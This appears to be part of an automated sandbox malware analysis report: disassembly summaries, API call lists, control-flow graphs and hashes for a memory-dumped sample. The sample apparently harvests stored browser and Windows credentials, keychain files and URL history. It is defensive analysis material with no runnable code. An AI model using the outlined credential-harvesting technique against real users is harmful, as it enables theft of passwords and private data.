                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwr_wcsncollmemcpywcscatwcscpy
                                                                                                                                                                                                                      • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                                                                                                                                                      • API String ID: 2745753283-3798722523
                                                                                                                                                                                                                      • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                                                                                                                                                      • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0041276D Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 149COMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                                                                                                                                        • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                                                                                                                        • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                                                                                                                                        • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                                                                                                      • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                                                                                                                                                                                      • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                                                                                                                                                      • String ID: $/deleteregkey$/savelangfile
                                                                                                                                                                                                                      • API String ID: 2744995895-28296030
                                                                                                                                                                                                                      • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                                                                                                                      • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040B6EF Relevance: 30.1, APIs: 15, Strings: 2, Instructions: 388fileCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 393 40b6ef-40b741 call 44db70 memset call 409c70 wcsrchr 398 40b743 393->398 399 40b746-40b795 memset call 40b2cc call 409d1f call 409b98 393->399 398->399 406 40b7c5-40b815 call 40bb98 memset CreateFileW 399->406 407 40b797-40b7c2 call 409c70 call 40b2cc call 409d1f 399->407 413 40b837-40b838 FindCloseChangeNotification 406->413 414 40b817-40b835 call 409a45 CopyFileW 406->414 407->406 415 40b83e-40b87f memset call 40a6e6 call 444432 413->415 414->415 425 40bad5-40badc 415->425 426 40b885-40b8ac call 40b273 call 438552 415->426 428 40baeb-40baf7 call 40b04b 425->428 429 40bade-40bae5 DeleteFileW 425->429 435 40b8b2-40b8b8 call 4251c4 426->435 436 40bacd-40bad0 call 443d90 426->436 429->428 440 40babc-40bac0 435->440 436->425 441 40bac6-40bac8 call 424f26 440->441 442 40b8bd-40b9af memset call 425413 * 5 call 4253ef call 40b64c call 40a71b * 4 call 40a734 call 4253af call 4253cf 440->442 441->436 472 40ba92-40bab2 call 4099c6 call 4099f4 442->472 473 40b9b5-40b9c9 memcmp 442->473 483 40bab4-40baba call 4251c4 472->483 474 40bafa-40bb2a call 404423 473->474 475 40b9cf-40b9d7 473->475 474->472 482 40bb30-40bb3a 474->482 475->472 477 40b9dd-40ba25 call 447280 call 447960 475->477 477->472 492 40ba27-40ba7a call 40afe8 call 447920 call 4472c0 memcmp 477->492 485 40bb3c 482->485 486 40bb3e-40bb93 memset memcpy call 40a734 LocalFree 482->486 483->440 485->486 486->472 500 40ba7c-40ba8e call 40a734 492->500 501 40ba8f 492->501 500->501 501->472
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                                                        • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                                                                                                                                                        • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                                                                                                                                                      • wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040B756
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                                                      • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                                                      • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                                                                                                                                                                                                      • FindCloseChangeNotification.KERNELBASE(00000000,?,?), ref: 0040B838
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040B851
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040B8CA
                                                                                                                                                                                                                      • memcmp.MSVCRT ref: 0040B9BF
                                                                                                                                                                                                                        • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                                                                                                        • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040BB53
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 0040BB66
                                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$File$Freewcsrchr$AddressChangeCloseCopyCreateDeleteFindLibraryLocalNotificationProcmemcmpmemcpywcscpy
                                                                                                                                                                                                                      • String ID: chp$v10
                                                                                                                                                                                                                      • API String ID: 170802307-2783969131
                                                                                                                                                                                                                      • Opcode ID: 8dc6b8fe780278cd99cc613ec7166550d0a6417af5ac3a690e601795cd80acd7
                                                                                                                                                                                                                      • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8dc6b8fe780278cd99cc613ec7166550d0a6417af5ac3a690e601795cd80acd7
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040E2AB Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 165COMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 505 40e2ab-40e2d5 call 40695d call 406b90 510 40e4a0-40e4af call 4069a3 505->510 511 40e2db-40e300 505->511 513 40e304-40e30f call 406e8f 511->513 516 40e314-40e316 513->516 517 40e476-40e483 call 406b53 516->517 518 40e31c-40e39b call 40dd50 * 7 memset call 40aa29 516->518 524 40e302 517->524 525 40e489-40e495 call 40aa04 517->525 542 40e3c9-40e3ce 518->542 543 40e39d-40e3ae call 40742e 518->543 524->513 525->510 531 40e497-40e49f ??3@YAXPAX@Z 525->531 531->510 545 40e3d0-40e3d6 542->545 546 40e3d9-40e3de 542->546 550 40e3b0 543->550 551 40e3b3-40e3c1 wcschr 543->551 545->546 548 40e3e0-40e3f1 memcpy 546->548 549 40e3f4-40e3f9 546->549 548->549 552 40e3fb-40e40c memcpy 549->552 553 40e40f-40e414 549->553 550->551 551->542 556 40e3c3-40e3c6 551->556 552->553 554 40e416-40e427 memcpy 553->554 555 40e42a-40e42f 553->555 554->555 557 40e431-40e442 memcpy 555->557 558 40e445-40e44a 555->558 556->542 557->558 559 40e44c-40e45b 558->559 560 40e45e-40e463 558->560 559->560 560->517 561 40e465-40e469 560->561 561->517 562 40e46b-40e473 561->562 562->517
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                                                                                        • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040E49A
                                                                                                                                                                                                                        • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040E380
                                                                                                                                                                                                                        • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                                                                                                        • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                                                                                                                                                                                                      • wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 0040E3EC
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 0040E407
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 0040E422
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 0040E43D
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy$_wcsicmpmemset$??3@wcschrwcslen
                                                                                                                                                                                                                      • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                                                                                                                                                      • API String ID: 3073804840-2252543386
                                                                                                                                                                                                                      • Opcode ID: 35fc9b2dc3bf0c53ac8202c9ceeae987a6694a0ed3ba5102275c9a20083620c3
                                                                                                                                                                                                                      • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 35fc9b2dc3bf0c53ac8202c9ceeae987a6694a0ed3ba5102275c9a20083620c3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 004091B8 Relevance: 25.8, APIs: 16, Strings: 1, Instructions: 272COMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 563 4091b8-40921b memset call 40a6e6 call 444432 568 409520-409526 563->568 569 409221-409248 call 40b273 call 438552 563->569 574 409383-4093ab call 40b273 call 438552 569->574 575 40924e-409258 call 4251c4 569->575 587 4093b1 574->587 588 4094ff-409502 call 443d90 574->588 580 40937b-40937e call 424f26 575->580 581 40925e-409291 call 4253cf * 2 call 4253af * 2 575->581 580->574 581->580 611 409297-409299 581->611 591 4093d3-4093dd call 4251c4 587->591 594 409507-40950b 588->594 598 4093b3-4093cc call 4253cf * 2 591->598 599 4093df 591->599 594->568 597 40950d-409511 594->597 597->568 601 409513-40951d call 408f2f 597->601 598->591 614 4093ce-4093d1 598->614 602 4094f7-4094fa call 424f26 599->602 601->568 602->588 611->580 613 40929f-4092a3 611->613 613->580 615 4092a9-4092ba 613->615 614->591 616 4093e4-4093fb call 4253af * 2 614->616 617 4092bc 615->617 618 4092be-4092e3 memcpy memcmp 615->618 616->602 628 409401-409403 616->628 617->618 619 409333-409345 memcmp 618->619 620 4092e5-4092ec 618->620 619->580 623 409347-40935f memcpy 619->623 620->580 622 4092f2-409331 memcpy * 2 620->622 625 409363-409378 memcpy 622->625 623->625 625->580 628->602 629 409409-40941b memcmp 628->629 629->602 630 409421-409433 memcmp 629->630 631 4094a4-4094b6 memcmp 630->631 632 409435-40943c 630->632 631->602 634 4094b8-4094ed memcpy * 2 631->634 632->602 633 409442-4094a2 memcpy * 3 632->633 635 4094f4 633->635 634->635 635->602
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3715365532-3916222277
                                                                                                                                                                                                                      • Opcode ID: 01ed04e1a7b420fb387fb27120c7235570de5edaa712acc26e4f47695a5ab2cb
                                                                                                                                                                                                                      • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 01ed04e1a7b420fb387fb27120c7235570de5edaa712acc26e4f47695a5ab2cb
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040E01E Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120fileCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                                                                                                                                                        • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                                                                                                                        • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                                                                                                        • Part of subcall function 0040DD85: FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                                                                                                                                        • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                                                                                                        • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                                                                                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                                                      • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                                                                                      • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                                                                                      • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                                                                                        • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                                                                                                                        • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                                                                        • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                                                                        • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                                                                                      • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                                                                                      • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                                                                                      • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                                                                                      • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                                                                                                      • FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: File$Close$Handle$CreateProcess$ChangeCurrentFindNotificationTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                                                                                                                                                      • String ID: bhv
                                                                                                                                                                                                                      • API String ID: 327780389-2689659898
                                                                                                                                                                                                                      • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                                                                                                                                      • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00413F4F Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 29libraryloaderCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 692 413f4f-413f52 693 413fa5 692->693 694 413f54-413f5a call 40a804 692->694 696 413f5f-413fa4 GetProcAddress * 5 694->696 696->693
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                                                                      • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                                                                                      • API String ID: 2941347001-70141382
                                                                                                                                                                                                                      • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                                                                                                                                                                      • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 004466F4 Relevance: 18.1, APIs: 12, Instructions: 134COMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 697 4466f4-44670e call 446904 GetModuleHandleA 700 446710-44671b 697->700 701 44672f-446732 697->701 700->701 702 44671d-446726 700->702 703 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 701->703 705 446747-44674b 702->705 706 446728-44672d 702->706 711 4467ac-4467b7 __setusermatherr 703->711 712 4467b8-44680e call 4468f0 _initterm __wgetmainargs _initterm 703->712 705->701 707 44674d-44674f 705->707 706->701 709 446734-44673b 706->709 710 446755-446758 707->710 709->701 713 44673d-446745 709->713 710->703 711->712 716 446810-446819 712->716 717 44681e-446825 712->717 713->710 718 4468d8-4468dd call 44693d 716->718 719 446827-446832 717->719 720 44686c-446870 717->720 723 446834-446838 719->723 724 44683a-44683e 719->724 721 446845-44684b 720->721 722 446872-446877 720->722 726 446853-446864 GetStartupInfoW 721->726 727 44684d-446851 721->727 722->720 723->719 723->724 724->721 728 446840-446842 724->728 730 446866-44686a 726->730 731 446879-44687b 726->731 727->726 727->728 728->721 732 44687c-446894 GetModuleHandleA call 41276d 730->732 731->732 735 446896-446897 exit 732->735 736 44689d-4468d6 _cexit 732->736 735->736 736->718
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2827331108-0
                                                                                                                                                                                                                      • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                                                                                                                                                      • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040C274 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112COMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040C298
                                                                                                                                                                                                                        • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                                                                                                                                                        • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                                                                                                                                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                                                      • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                                                                                      • wcschr.MSVCRT ref: 0040C324
                                                                                                                                                                                                                      • wcschr.MSVCRT ref: 0040C344
                                                                                                                                                                                                                      • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                                                                                      • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                                                                                                                                                      • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                                                                                                                                                                                                                      • String ID: visited:
                                                                                                                                                                                                                      • API String ID: 1157525455-1702587658
                                                                                                                                                                                                                      • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                                                                                                                                      • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040E175 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 91COMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 763 40e175-40e1a1 call 40695d call 406b90 768 40e1a7-40e1e5 memset 763->768 769 40e299-40e2a8 call 4069a3 763->769 771 40e1e8-40e1fa call 406e8f 768->771 775 40e270-40e27d call 406b53 771->775 776 40e1fc-40e219 call 40dd50 * 2 771->776 775->771 781 40e283-40e286 775->781 776->775 787 40e21b-40e21d 776->787 784 40e291-40e294 call 40aa04 781->784 785 40e288-40e290 ??3@YAXPAX@Z 781->785 784->769 785->784 787->775 788 40e21f-40e235 call 40742e 787->788 788->775 791 40e237-40e242 call 40aae3 788->791 791->775 794 40e244-40e26b _snwprintf call 40a8d0 791->794 794->775
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
